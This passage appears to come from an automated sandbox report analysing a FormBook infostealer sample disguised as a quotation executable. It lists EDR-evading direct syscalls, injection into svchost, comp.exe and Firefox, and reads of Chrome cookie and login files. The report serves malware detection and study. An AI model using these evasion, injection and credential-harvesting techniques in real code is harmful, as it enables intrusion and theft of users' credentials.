                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303EA80 mov eax, dword ptr fs:[00000030h]4_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303EA80 mov eax, dword ptr fs:[00000030h]4_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303EA80 mov eax, dword ptr fs:[00000030h]4_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303EA80 mov eax, dword ptr fs:[00000030h]4_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303EA80 mov eax, dword ptr fs:[00000030h]4_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03104A80 mov eax, dword ptr fs:[00000030h]4_2_03104A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03068A90 mov edx, dword ptr fs:[00000030h]4_2_03068A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03038AA0 mov eax, dword ptr fs:[00000030h]4_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03038AA0 mov eax, dword ptr fs:[00000030h]4_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03086AA4 mov eax, dword ptr fs:[00000030h]4_2_03086AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03086ACC mov eax, dword ptr fs:[00000030h]4_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03086ACC mov eax, dword ptr fs:[00000030h]4_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03086ACC mov eax, dword ptr fs:[00000030h]4_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03030AD0 mov eax, dword ptr fs:[00000030h]4_2_03030AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03064AD0 mov eax, dword ptr fs:[00000030h]4_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03064AD0 mov eax, dword ptr fs:[00000030h]4_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306AAEE mov eax, dword ptr fs:[00000030h]4_2_0306AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306AAEE mov eax, dword ptr fs:[00000030h]4_2_0306AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AE908 mov eax, dword ptr fs:[00000030h]4_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030AE908 mov eax, dword ptr fs:[00000030h]4_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BC912 mov eax, dword ptr fs:[00000030h]4_2_030BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03028918 mov eax, dword ptr fs:[00000030h]4_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03028918 mov eax, dword ptr fs:[00000030h]4_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B892A mov eax, dword ptr fs:[00000030h]4_2_030B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C892B mov eax, dword ptr fs:[00000030h]4_2_030C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B0946 mov eax, dword ptr fs:[00000030h]4_2_030B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03056962 mov eax, dword ptr fs:[00000030h]4_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03056962 mov eax, dword ptr fs:[00000030h]4_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03056962 mov eax, dword ptr fs:[00000030h]4_2_03056962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0307096E mov eax, dword ptr fs:[00000030h]4_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0307096E mov edx, dword ptr fs:[00000030h]4_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0307096E mov eax, dword ptr fs:[00000030h]4_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D4978 mov eax, dword ptr fs:[00000030h]4_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D4978 mov eax, dword ptr fs:[00000030h]4_2_030D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BC97C mov eax, dword ptr fs:[00000030h]4_2_030BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030429A0 mov eax, dword ptr fs:[00000030h]4_2_030429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030309AD mov eax, dword ptr fs:[00000030h]4_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030309AD mov eax, dword ptr fs:[00000030h]4_2_030309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B89B3 mov esi, dword ptr fs:[00000030h]4_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B89B3 mov eax, dword ptr fs:[00000030h]4_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B89B3 mov eax, dword ptr fs:[00000030h]4_2_030B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C69C0 mov eax, dword ptr fs:[00000030h]4_2_030C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A9D0 mov eax, dword ptr fs:[00000030h]4_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A9D0 mov eax, dword ptr fs:[00000030h]4_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A9D0 mov eax, dword ptr fs:[00000030h]4_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A9D0 mov eax, dword ptr fs:[00000030h]4_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A9D0 mov eax, dword ptr fs:[00000030h]4_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A9D0 mov eax, dword ptr fs:[00000030h]4_2_0303A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030649D0 mov eax, dword ptr fs:[00000030h]4_2_030649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FA9D3 mov eax, dword ptr fs:[00000030h]4_2_030FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BE9E0 mov eax, dword ptr fs:[00000030h]4_2_030BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030629F9 mov eax, dword ptr fs:[00000030h]4_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030629F9 mov eax, dword ptr fs:[00000030h]4_2_030629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BC810 mov eax, dword ptr fs:[00000030h]4_2_030BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03052835 mov eax, dword ptr fs:[00000030h]4_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03052835 mov eax, dword ptr fs:[00000030h]4_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03052835 mov eax, dword ptr fs:[00000030h]4_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03052835 mov ecx, dword ptr fs:[00000030h]4_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03052835 mov eax, dword ptr fs:[00000030h]4_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03052835 mov eax, dword ptr fs:[00000030h]4_2_03052835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306A830 mov eax, dword ptr fs:[00000030h]4_2_0306A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D483A mov eax, dword ptr fs:[00000030h]4_2_030D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D483A mov eax, dword ptr fs:[00000030h]4_2_030D483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03042840 mov ecx, dword ptr fs:[00000030h]4_2_03042840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03060854 mov eax, dword ptr fs:[00000030h]4_2_03060854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03034859 mov eax, dword ptr fs:[00000030h]4_2_03034859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03034859 mov eax, dword ptr fs:[00000030h]4_2_03034859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BE872 mov eax, dword ptr fs:[00000030h]4_2_030BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BE872 mov eax, dword ptr fs:[00000030h]4_2_030BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C6870 mov eax, dword ptr fs:[00000030h]4_2_030C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C6870 mov eax, dword ptr fs:[00000030h]4_2_030C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03030887 mov eax, dword ptr fs:[00000030h]4_2_03030887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030BC89D mov eax, dword ptr fs:[00000030h]4_2_030BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305E8C0 mov eax, dword ptr fs:[00000030h]4_2_0305E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FA8E4 mov eax, dword ptr fs:[00000030h]4_2_030FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306C8F9 mov eax, dword ptr fs:[00000030h]4_2_0306C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306C8F9 mov eax, dword ptr fs:[00000030h]4_2_0306C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E6F00 mov eax, dword ptr fs:[00000030h]4_2_030E6F00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03032F12 mov eax, dword ptr fs:[00000030h]4_2_03032F12
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306CF1F mov eax, dword ptr fs:[00000030h]4_2_0306CF1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305EF28 mov eax, dword ptr fs:[00000030h]4_2_0305EF28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B4F40 mov eax, dword ptr fs:[00000030h]4_2_030B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B4F40 mov eax, dword ptr fs:[00000030h]4_2_030B4F40
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_00E580A9
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E2A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E2A155
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E2A124 SetUnhandledExceptionFilter,0_2_00E2A124

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\comp.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: NULL target: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: NULL target: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\comp.exeThread register set: target process: 8084Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\comp.exeThread APC queued: target process: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2408008Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E587B1 LogonUserW,0_2_00E587B1
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E03B3A
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E048D7
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E64C7F mouse_event,0_2_00E64C7F
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QUOTATON-37839993.exe"Jump to behavior
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeProcess created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E57CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00E57CAF
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E5874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00E5874B
                Source: QUOTATON-37839993.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: FOBNeEFwBsF.exe, 0000000C.00000000.2513686077.0000000001511000.00000002.00000001.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000C.00000002.4008099962.0000000001511000.00000002.00000001.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4008754897.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: QUOTATON-37839993.exe, FOBNeEFwBsF.exe, 0000000C.00000000.2513686077.0000000001511000.00000002.00000001.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000C.00000002.4008099962.0000000001511000.00000002.00000001.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4008754897.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: FOBNeEFwBsF.exe, 0000000C.00000000.2513686077.0000000001511000.00000002.00000001.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000C.00000002.4008099962.0000000001511000.00000002.00000001.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4008754897.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: FOBNeEFwBsF.exe, 0000000C.00000000.2513686077.0000000001511000.00000002.00000001.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000C.00000002.4008099962.0000000001511000.00000002.00000001.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4008754897.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E2862B cpuid 0_2_00E2862B
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E34E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00E34E87
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E41E06 GetUserNameW,0_2_00E41E06
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E33F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00E33F3A
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E049A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.2640000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.2640000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2589543027.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4007316653.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4008699192.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4010692987.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2590876860.0000000005120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4008790036.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.4008647896.0000000002CC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2590442326.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\comp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
